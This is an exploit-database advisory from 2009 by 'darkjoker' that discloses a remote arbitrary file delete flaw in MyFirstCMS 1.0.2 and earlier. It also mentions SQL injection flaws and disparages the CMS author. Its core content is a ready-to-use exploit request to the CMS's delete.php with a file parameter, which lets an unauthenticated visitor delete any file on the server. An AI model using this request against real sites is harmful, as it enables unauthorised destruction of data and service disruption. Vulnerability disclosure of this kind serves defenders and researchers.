id: 5243
date: 05/25/2009
title: MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
author: darkjoker
cves: 

==============================================================
MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
==============================================================


--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]



#  0day.today [2023-03-25]  #